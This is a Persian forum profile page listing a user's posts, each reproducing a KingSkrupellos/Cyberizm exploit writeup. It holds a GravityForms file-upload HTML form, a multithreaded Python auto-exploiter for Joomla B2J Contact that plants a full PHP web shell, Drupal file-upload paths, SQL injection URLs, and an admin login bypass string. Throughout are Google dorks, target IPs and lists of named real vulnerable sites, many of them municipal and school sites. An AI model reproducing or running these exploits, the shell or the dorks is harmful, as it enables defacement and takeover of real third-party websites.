امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

mohammad_ghazei

 مدیر بخش
  • تعداد ارسال ها

    532
  • امتیاز

    2,559 
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    2

آخرین بار برد mohammad_ghazei در 12 مهر

mohammad_ghazei یکی از رکورد داران بیشترین تعداد پسند مطالب است !

2 دنبال کننده

درباره mohammad_ghazei

  • درجه
    ██████▒▒▒▒ %53

مشخصات کاربر

  • جنسیت
    آقا | Male
  • محل سکونت
    غزه

آخرین بازدید کنندگان نمایه

265 بازدید کننده نمایه
  1. # Exploit Title : WordPress Theme Sydney by aThemes 2018 GravityForms Input Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Vendor Homepages : athemes.com/theme/sydney/ ~ gravityforms.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ~ CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Google Dork : intext:''Proudly powered by WordPress | Theme: Sydney by aThemes.'' # Exploit HTML Code : <title>WordPress Theme Sydney by aThemes GravityForms Exploiter</title> <form action="http://www.TARGETSITE/?gf_page=upload" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.html" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> </form> [img=http://www.imageupload.co.uk/images/2018/06/08/gravityphp5athemes.png] Exploit : TARGET/?gf_page=upload We cannot upload directly with this exploit. But we can upload our file to the site with remote file exploiter. # Error : {"status" : "error", "error" : {"code": 500, "message": "Failed to upload file."}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest1.png] # Error [ Successful ] : {"status":"ok","data":{"temp_filename":"..\/..\/_input__kingskrupellos.php5","uploaded_filename":"kingskrupellos.php"}} [img=http://www.imageupload.co.uk/images/2018/06/08/miplantest2.png] # Allowed File Extensions : .html .htm .php5 .txt .jpg .gif .png .html.fla .phtml .pdf # You don't need to change your filename as _input__kingskrupellos.php5 like this. # Just choose a file from your machine and upload it with the beforementioned extensions. # For example : yourfilename.php file will upload to the server [ site ] like this. /_input__kingskrupellos.php5 # Example Usage for Windows : # Use with XAMPP Control Panel and your Localhost. # Use from htdocs folder located in XAMPP # 127.0.0.1/athemeswordpressexploiter.html # Path : TARGET/_input__kingskrupellos.php5 [img=http://www.imageupload.co.uk/images/2018/06/08/Screenshot_1.png] ################################################################################################# # Example Site => miplantestclub.com => [ Proof of Concept ] => archive.is/APl6J [ Error ] => archive.is/7G0Jq [ Successful ] ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  2. # Exploit Title : Joomla Codextrous Com_B2jcontact Component Shell Upload Vulnerability Auto Exploiter Python # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 24/06/2018 # Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html ~ extensions.joomla.org/extension/b2j-contact/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Description : B2J Contact is one of the most popular extension of Codextrous which is used for create Contact forms. This revolutionary, multi-functional Joomla! contact form component is super easy-to-install, that brings you the ultimate in User Experience with its clean design and user friendly backend. You can create as many contact forms as you want. You can create a contact form and to display it you create its menu as well. B2J Contact component comes with a module also, by which you can display contact form where ever you want. B2J Contact has got the following main options which users may customize: Basic Option - Default Fields - Dynamic Fields - Events - Security Each section on its own opens up great custom options/fields for you to play with to get your contact form up and running smoothly. Despite its enormous functionality, B2J Contact Component is extremely lightweight with an amazing design. Whether you are making an online survey or simply creating another contact form, B2J Contact Component is there to help you! B2J Contact comes with all the below mentioned key features and more: Joomla! 3.0 Support - In-buit Form Builder - Access to extension support system - All features shown on the Demo ################################################################################################# # Google Dorks : inurl:''/index.php?option=com_b2jcontact'' inurl:''/components/com_b2jcontact/'' intext:''Another Great Website by One Spot Media.'' intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed under MIT License. Font Awesome font licensed under SIL OFL 1.1.'' intext:''POWERED BY VISUALPROJECT WEB'' intext:''© 2013-2014 Opentec SRL, tutti i diritti riservati.'' intext:''honlap: rosko.hu'' +There are more dorks. Use your brain to find more. # Exploit : /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah # Error displaying on the page [ Error Language changes according to the country ] : {"error":"File is empty."} {"error":"No files were uploaded."} {"error":"null."} {"error":"Keine Dateien hochgeladen."} # Uploaded File Path : /components/com_b2jcontact/..... # Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png .xml .pdf and other extensions. # Use Auto Exploiter Tool for this Vulnerability. ################################################################################################# # Auto Exploitation Tool Python => import requests as r import argparse as arg import os, sys import urllib2,urllib,re from multiprocessing import Pool from multiprocessing.dummy import Pool as ThreadPool from urlparse import urlparse import random, string #Coded By KingSkrupellos #Cyberizm Digital Security Team def wibu(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) shell = """ <?php function fUUPd($NVAR) { $NVAR=gzinflate(base64_decode($NVAR)); for($i=0;$i<strlen($NVAR);$i++) { $NVAR[$i] = chr(ord($NVAR[$i])-1); } return $NVAR; <?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title> CyBeRizM Dosya Yöneticisi Sh3LL </title> <center><img src="http://i.hizliresim.com/3vnXyj.gif"></center> <style> body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: silver; } #content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; } table{ border: 1px #000000 dotted; } H1{ font-family: "Rye", cursive; } a{ color: #000; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <H1><center> Cyberizm.Org / KingSkrupellos </center></H1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Nerde miyim? : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">Dosya Yüklendi</font><br />'; }else{ echo '<font color="red">Dosya Yüklenemedi</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Dosya Yükle : <input type="file" name="file" /> <input type="submit" value="Yükle" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Tamamdır!</font><br />'; }else{ echo '<font color="red">Malesef!</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Kaydedildi.</font><br />'; }else{ echo '<font color="red">Kaydedilemedi.</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Kaydedildi</font><br />'; }else{ echo '<font color="red">Malesef</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Silindi.</font><br />'; }else{ echo '<font color="red">Silinemedi.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Dosya Adı</center></td> <td><center>Boyut</center></td> <td><center>İzinler</center></td> <td><center>Ayarlar</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin Yeri </option> <option value=\"rename\">Adı Değiştir</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Sil</option> <option value=\"chmod\">Dizin</option> <option value=\"rename\">Adı Değiştir</option> <option value=\"edit\">Düzenle</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<br />Only belongs to KingSkrupellos </font>, Recoded By <font color="red">KingSkrupellos / Cyberizm.Org |</font><br />Bilgi: <font color="red">http://www.cyberizm.org/</font> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>""" def Fox_Contact(url): if url[-1] != "/": url = site + "/" if url[:7] != "http://" and url[:8] != "https://": url = "http://" + url return url user_agent = {'User-agent': 'Mozilla/5.0'} try : Filelist = open(sys.argv[1], 'r').readlines() for i in Filelist: try: url=i.strip() urlpa = urlparse(url) site = urlpa.netloc site=Fox_Contact(url) print "[#]Url:"+site req = urllib2.Request(url) opreq = urllib2.urlopen(req).read() b2jcomids = re.findall('<a name="b2jcomid_(.*?)"></a>',opreq) print "[+]Exploiting b2jcomid" for b2jcomid in b2jcomids: b2jcomid=str(b2jcomid) print "[#]b2jcomid:"+b2jcomid halah = str("common.php") b0x_dir = [("index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah)] diretorios=0 for diretorio in b0x_dir: diretorios += 1 url_vuln = site + diretorio shell_dir = site + "/components/com_b2jcontact/"+halah+"?ina" checa_site = r.get(url_vuln, headers=user_agent) if '{"' in checa_site.text: print( "\n[!] exploiting in {}...".format(diretorios)) envia_shell = r.post(url_vuln, data=shell, headers=user_agent) verifica_shell = r.get(shell_dir, headers=user_agent) if "Cwd:" in verifica_shell.text: a = open('Attacker.txt','a') a.write(shell_dir+'\n') print( "\n[*]Good 1 ") print( "[+] deface dir "+shell_dir) else: print("shell Upload *_* : ", shell_dir) else: print("\n[-] Fuck Sites : {}.".format(diretorios)) except Exception as ex : print "[#]Fuck Site !~! " pool = ThreadPool(10) pool.map(Fox_Contact, Filelist) pool.close() pool.join() except : print "[+] You not inputing list file" ################################################################################################# CVE Details => cvedetails.com/vulnerability-list/vendor_id-16496/product_id-37996/Codextrous-B2j-Contact.html CVE-2017-9030 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a directory traversal attack that bypasses a uniqid protection mechanism, and makes it easier to read arbitrary uploaded files. CVE-2017-5215 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows a rename attack that bypasses a "safe file extension" protection mechanism, leading to remote code execution. CVE-2017-5214 The Codextrous B2J Contact (aka b2j_contact) extension before 2.1.13 for Joomla! allows prediction of a uniqid value based on knowledge of a time value. This makes it easier to read arbitrary uploaded files. ################################################################################################# Another Exploiter Tool Python Coded [ If another exploit don't work - use this - Only Shell Code Changed ] ghostbin.com/paste/psoza - archive.is/sDumw ################################################################################################# # Example Sites : garrhotel.com/welcome/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en nuovaestetica.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah masthamnsoperan.se/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah raiffeisen-schwaben-allgaeu.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah best-sl.fr/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah lsvgz.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en strand-catering.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah drtoldilaszlo.hu/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah kleintierverhalten.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah infortelematica.it/site/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah cosmo-homes.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah hotelcorona.fg.it/joomla/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah hotelruas.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en osteriasantatrinita.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah insentis.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah ristorantepizzeriasanmartino.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en wukrohr.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah hubico.ch/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en vr-lagerhaus-obb-so.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en mercuriuscatering.nl/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en rwg-essenbach.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en liaisonsante.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah + Proof of Concept for the Vulnerability : archive.is/rjRKz ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team # Original Reference Link => cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html #################################################################################################
  3. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : argentina.gob.ar/paisdigital # Tested On : Windows # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060021 ################################################################################################# # Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar # Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar # Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar # Exploit : /?q=contacto # Path : /sites/default/files/webform/.... # Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx. ################################################################################################# # Target IP Address => 186.33.254.182 # Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS pellegrini.gov.ar magdalena.gob.ar marull.gob.ar pampablanca.gob.ar municipalidaddeabrapampa.gob.ar saladillo.gob.ar lasflores.gob.ar municipalidaddearrayanal.gob.ar palmasola.gob.ar frailepintado.gob.ar rinconada.gob.ar montedelosgauchos.gob.ar trescruces.gob.ar generallavalle.gob.ar vinalito.gob.ar puestoviejo.gob.ar balcarce.gob.ar ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  4. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/06/2018 # Vendor Homepage : regione.toscana.it - jquery.com # Tested On : Windows # Version : 7 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060240 ################################################################################################# # Google Dorks : intext:''Scrivi al Comune'' site:fi.it Il testo del tuo messaggio * site:fi.it # Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19 # Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/..... # Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx. # Don't forget to put www. before comune. on the URL Address bar. ################################################################################################# # Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH www.comune.vicchio.fi.it/segnalazioni-e-reclami-0 www.comunebarberino.it/scrivi-al-comune www.comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0 www.comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0 www.comune.rignano-sullarno.fi.it/scrivi-al-comune www.comune.pontassieve.fi.it/scrivi-al-comune-0 www.comune.marradi.fi.it/scrivi-al-comune www.comune.dicomano.fi.it/scrivi-al-comune-0 www.comune.reggello.fi.it/scrivi-al-comune-0 www.comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune www.comune.scarperiaesanpiero.fi.it/scrivi-al-comune www.comune.provagliodiseo.bs.it/node/19 www.comune.terni.it/scrivi-al-comune ################################################################################################ Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  5. # Exploit Title : Developed by Desh Universal (Pvt.) Limited Bangladesh SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Vendor Homepage : deshuniversal.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090018 ################################################################################################# # Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.'' # Exploits : /teacher?page=[SQL Injection] /all-teacher-view?dept_id=[SQL Injection] /achievement-events?eventid=[SQL Injection] /text-file?file_id=[SQL Injection] /teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection] /event-details?events-id=[SQL Injection] /notice-details?nid=[SQL Injection] /messages?messageid=[SQL Injection] /text-file?file_id=[SQL Injection] /details?id=[SQL Injection] /details?cat-id=[SQL Injection] /program-subjects?programID=[SQL Injection] /video-details?vid=[SQL Injection] # Admin Control Panel Path => /login It redirects to another links for login with username and pass. ################################################################################################# # Example Vulnerable Sites => 1) rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4 2) acps.edu.bd/messages?mid=101%27 3) cpscm.edu.bd/details?id=5%27 4) dcc.edu.bd/notice-details?nid=666%27 5) dcgpsc.edu.bd/details?id=14%27 6) sagc.edu.bd/details-photo?albumID=5%27 7) bbcpsc.edu.bd/details?id=12%27 8) gpcpsc.edu.bd/achievement_details?content_id=16%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  6. ################################################################################################# # Exploit Title : Software Developed By Copotronic Shikkhangon Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 06/07/2018 # Vendor Homepages : copotronic.com ~ shikkhangon.com # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] # CXSecurity : cxsecurity.com/ascii/WLB-2018070067 ################################################################################################# # Another Exploit Title : Software IT Development By Copotronic InfoSystems Limited Shikkhangon CiMS Web Design Md. Iqbal Hossain Rimon Admin Login Bypass Vulnerability # Description of the Software : Design & Develop By Copotyronic InfoSystem Ltd Copotronic InfoSystems Ltd. is a Private-Govt. joint venture software company. With a mission to build digital Bangladesh People’s Republic of Bangladesh has taken initiative to promote in IT companies to enable extensive automation services and supports to Govt. organizations of Bangladesh to be Digital.COPOTRONIC is a dynamic organization engaged in promoting software products, services,consultancy, Training using latest technologies to wide spectrum of corporations for over one decade. The quality & technology of the products reflect COPOTRONIC’s ability to produce & deliver world-class software solutions ################################################################################################# # Google Dorks : intext:''Copyright © 2018 Shikkhangon.com. All Right Reserved.'' intext:''© Copotronic InfoSystems Limited. All Right Reserved.'' inurl:''/about_college/'' site:edu.bd Copotronic # Admin Control Panel Path => /admin /login # Exploit : Username : '=''or' Password : '=''or' # Useable Administration Control Panel URL Links => /web/principal_message /web/notice /web/notice_list /web/form_add /web/form_list /web/information_list /web/slide /web/about /web/picture_gallery /web/catagory_list /admin/teacher_registration /admin/teacher_list /academic/class_teacher_assign /admin/teacher_salary_structure /admin/staff_registration /admin/staff_list /admin/student_registration /admin/student_list /admin/class_wise_student_list /admin/section_wise_student_list /admin/student_subject_assign /admin/student_subject_view /fees/fees_cat /fees/class_wise_fees_management /fees/student_fees_generate /web/slide# /academic/set_ca_marks /academic/create_tabulation_sheet /academic/marit_list /academic/marit_list_class /academic/mark_sheet /academic/transcript /academic/tabulation_sheet /academic/tabulation_sheet_subject_wise /academic/result_view /accounts/master_head_create /accounts/master_head_list /accounts/sub1_head_create /accounts/sub1_head_list /accounts/sub2_head_create /accounts/sub2_head_list /accounts/sub3_head_create /accounts/sub3_head_list /accounts/navigation_head_view /accounts/debit_voucher_entry /accounts/debit_voucher_list /accounts/credit_voucher_entry /accounts/credit_voucher_list /web/book_category_list /web/book_list /admin/student_sms_notice /admin/attendance /academic/show_class_routine /academic/show_exam_routine /admin/institute_information /admin/class_list /web/class_assign /academic/set_class_timing /academic/class_routine /admin/section_list /admin/section_assign /admin/session_list /admin/shift_list /admin/subject_list /admin/subject_assign /academic/gpa_system /academic/mark_distribution_system /academic/term_subject_list /academic/subject_wise_total_marks_list /academic/set_exam_time /academic/set_admit_card_initial /academic/term_list /admin/chartof_accounts /admin/weekly_holiday /admin/shift_assign Uploaded Image Path from Admin Panel => /template/upload/principal_image/1_principal_image[RANDOMNUMBER].png .jpg .jpeg .gif ################################################################################################# # Example Sites and Target Vulnerable IP Address 144.217.239.135 => 1) gachuaadarshahs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => zone-h.org/mirror/id/31443090 ~ archive.is/xfYrE 2) dbmrhs.edu.bd/login => [ Proof of Concept for the Vulnerability ] => archive.is/JhaLN Vendor Homepage Admin Panel Path => copotronic.com/ims/shikkhangon/shikkhangon_admin/ 3) gnamhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/hgFkL 4) uttararesidentialcollege.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/1DOxK 5) prbsc1930.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/qCvp3 6) sandwipidealhs.edu.bd => [ Proof of Concept for the Vulnerability ] =>archive.is/CHF7H 7) kadhurkhilhighschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ipG78 7) kalapaniahs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/5Mv84 8) alhelalsat.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/ZyP4d 9) kapasgolaschool.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/pUGuF 10) mhabhs.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/WxjIg 11) psidm.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/lw9D0 12) bgka.edu.bd => [ Proof of Concept for the Vulnerability ] => archive.is/95DZt ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
